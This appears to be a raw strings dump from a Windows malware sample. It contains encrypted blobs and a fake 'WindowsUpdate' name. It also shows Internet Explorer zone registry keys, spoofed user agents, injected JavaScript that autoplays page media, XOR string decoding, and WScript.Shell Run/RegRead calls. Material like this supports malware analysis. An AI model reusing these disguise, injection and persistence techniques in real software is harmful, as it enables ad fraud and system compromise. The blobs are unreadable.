hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
c:\%original file name%.exe path>path inj_ffile>inj_ffile
c:\%original file name%.exe path>path inj_ffile>inj_ffile
regsvr32.exe_684:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
2 2*393
2 2*393
7:8?8[8`8
7:8?8[8`8
8$8(8,8084888
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP 